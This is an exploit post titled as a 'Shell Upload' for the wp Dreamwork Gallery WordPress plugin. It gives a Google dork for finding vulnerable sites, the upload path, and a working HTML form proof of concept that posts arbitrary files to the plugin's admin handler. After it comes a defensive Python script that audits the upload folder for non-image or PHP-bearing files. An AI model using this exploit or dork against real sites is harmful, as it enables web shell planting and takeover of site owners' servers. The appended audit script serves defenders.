3xploit3r

Wordpress wp Dreamwork Gallery Shell Upload

Aug 27th, 2016
<!--


    \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
     \ \ / /| | '__| | | / __|\  /| | | |_  /
      \ V / | | |  | |_| \__ \/  \| |_| |/ /
       \_/  |_|_|   \__,_|___/_/\_\____//___|

                                              -->
#########################################################
# Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
# Contact: FB: Abdou MjCodez Tw: VirusXDz
# Category: webapps
# Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
########################################################



# Proof of Concept

The uploaded file will be located in the following directory.

Example: [(7)_uploadfolder]
/wp-content/uploads/dreamwork/7_uploadfolder/big/


<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Video:
https://youtu.be/_7uAkAzlFrY

Bye
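
A defender-side check, added here and not part of the original paste: it walks the plugin's upload tree named above (wp-content/uploads/dreamwork/<album>/big/) and reports files that are not plain images, judged by extension and by content. The function names, the extension allow-list and the demo files are assumptions made for this example.

```python
import os
import tempfile

# Assumption: the gallery should only ever store these image types.
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")  # JPEG, PNG, GIF


def audit_dreamwork_uploads(wp_root):
    """Return sorted (relative path, reason) pairs for suspicious uploads."""
    base = os.path.join(wp_root, "wp-content", "uploads", "dreamwork")
    findings = []
    for dirpath, _dirs, files in os.walk(base):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, wp_root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            ext = os.path.splitext(name)[1].lower()
            if ext not in IMAGE_EXTS:
                findings.append((rel, "non-image extension"))
            elif not data.startswith(MAGIC):
                findings.append((rel, "content is not an image"))
            elif b"<?php" in data.lower():
                findings.append((rel, "image with embedded PHP tag"))
    return sorted(findings)


def build_demo_tree(root):
    """Constructed sample files standing in for a real uploads directory."""
    big = os.path.join(root, "wp-content", "uploads", "dreamwork",
                       "7_uploadfolder", "big")
    os.makedirs(big)
    samples = {
        "cover.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "notes.php": b"<?php /* constructed placeholder */ ?>",
        "logo.png": b"<?php /* constructed placeholder */ ?>",
        "banner.gif": b"GIF89a" + b"\x00" * 8 + b"<?PHP ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(big, name), "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for rel, reason in audit_dreamwork_uploads(tmp):
            print(f"{rel}: {reason}")
```

Configuring the web server so that nothing under wp-content/uploads/ is executed as PHP is the complementary control; this audit only reports what is already on disk.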